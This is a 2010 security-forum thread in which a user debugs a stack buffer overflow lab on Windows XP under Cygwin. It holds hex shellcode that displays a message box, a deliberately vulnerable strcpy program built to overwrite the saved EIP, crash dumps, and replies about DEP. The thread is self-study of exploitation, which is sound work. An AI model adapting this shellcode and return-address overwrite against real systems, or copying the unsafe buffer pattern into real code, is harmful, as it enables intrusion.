[Win XP Pro SP3/Cygwin] Payload/shellcode not executing

Networking/Security Forums -> Programming and More

Author: draggy PostPosted: Mon Sep 06, 2010 7:16 am    Post subject: [Win XP Pro SP3/Cygwin] Payload/shellcode not executing
    ----
Hello people,

The payload/shellcode that reside in my array won't execute or hang after the saved EIP on the stack was overwrite with array address.

Here is my payload which is typically display a message box:

msgbox.c:

Code:

#include <stdio.h>

char shellcode[] =    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
         "\x51\x68\x6c\x6c\x20\x20\x68\x33"
         "\x32\x2e\x64\x68\x75\x73\x65\x72"
         "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
         "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
         "\xc1\x11\x11\x11\x11\x51\x68\x61"
         "\x67\x65\x42\x68\x4d\x65\x73\x73"
         "\x89\xe1\x51\x50\xbb\x40\xae\x80"
         "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
         "\x51\x51\x52\xff\xd0\x31\xc0\x50"
         "\xb8\x12\xcb\x81\x7c\xff\xd0";

int main(void)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %d\n", strlen(shellcode));
           printf("Shellcode sizeof is : %d\n", sizeof(shellcode)/sizeof(char));
   (int)(*func)();
   
        return 0;
}


Here is the problem:

vul.c:

Code:

#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <string.h>

char shellcode[] =    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
         "\x51\x68\x6c\x6c\x20\x20\x68\x33"
         "\x32\x2e\x64\x68\x75\x73\x65\x72"
         "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
         "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
         "\xc1\x11\x11\x11\x11\x51\x68\x61"
         "\x67\x65\x42\x68\x4d\x65\x73\x73"
         "\x89\xe1\x51\x50\xbb\x40\xae\x80"
         "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
         "\x51\x51\x52\xff\xd0\x31\xc0\x50"
         "\xb8\x12\xcb\x81\x7c\xff\xd0";
         "BBBB"                     //overwrite EBP
         "\xd1\xcc\x22\x00"; //overwrite EIP with function2()'s c array address
               
               
void function2(void)
{
   char c[87];
   
   printf("Address c = %p and value = %x\n", (void *) (&c[0]), c[0]);
   
   strcpy(c, shellcode);
}

int main(void)
{
   printf("function 2 address = %p\n", (void *) (function2));
   
   function2();
   
   return 0;
}


and the undesired output:

Code:

$ uname -a
CYGWIN_NT-5.1 changeme 1.7.7(0.230/5/3) 2010-08-31 09:58 i686 Cygwin

$ ./vul
function 2 address = 0x4011a0
Address c = 0x22ccd1 and value = 1d
Segmentation fault (core dumped)

$ cat vul.exe.stackdump
Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3
eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64
ebp=42424242 esp=0022CD20 program=C:\exploit\vul\vul.exe, pid 924, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
Stack trace:
Frame     Function  Args
      3 [main] vul 924 exception::handle: Error while dumping state (probably corrupted stack)


Does the Data Execution Prevention (DEP) on Windows XP Pro SP3 preventing the payload from executing after the EIP has been overwrite with the function2()'s "c" array address on the Cygwin environment?

Author: draggy PostPosted: Mon Sep 06, 2010 5:59 pm    Post subject:
    ----
Update:

Turning off and on the DEP doesn't help in this situation.

I found that when I overwrite the saved EIP with the global variable "shellcode" address, the payload/shellcode will execute completely.

I wonder why it was not working when I overwrite the saved EIP with the function2's local variable "c" address.

Thank

Author: alt.don PostPosted: Mon Sep 06, 2010 10:41 pm    Post subject:
    ----
Hello draggy,

There are many variables at play here which could have affected one lab test over another. I would suggest you write exactly what your lab environment was and we can then help troubleshoot it somewhat better.

--Don

Author: Fire AntLocation: London PostPosted: Tue Sep 07, 2010 9:16 am    Post subject:
    ----
draggy,

Did you check out the error message? It seems you have overwritten EBX rather than EIP.

eip=0022CCF3
ebp=42424242

Fire Ant

Author: draggy PostPosted: Tue Sep 07, 2010 11:20 am    Post subject:
    ----
Hello Don and Fireant,

Thank you for reply and come to aid me Very Happy

Hello Don,

The program was develop and tested on virtual machine environment (VMWare x86 -> 32 bits) Cygwin v 1.7.7 under Windows XP Pro SP3 platform. By the way, there is AVG (anti-virus) installed.

Hello Fireant,

ebp=42424242 == "\x42\x42\x42\x42" == "BBBB" right? (ascii table)

eip=0022CCF3 -> ""\xd1\xcc\x22\x00" == 0022CCD1 -> 0022CCF3 - 0022CCD1 = 22 (decimal is 34 bytes)

This mean the shellcode was executed till 33/34 bytes from 0x0022CCD1 (function2's local "c" array address) and it stop, plus it got dump.

Thanks



Networking/Security Forums -> Programming and More


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group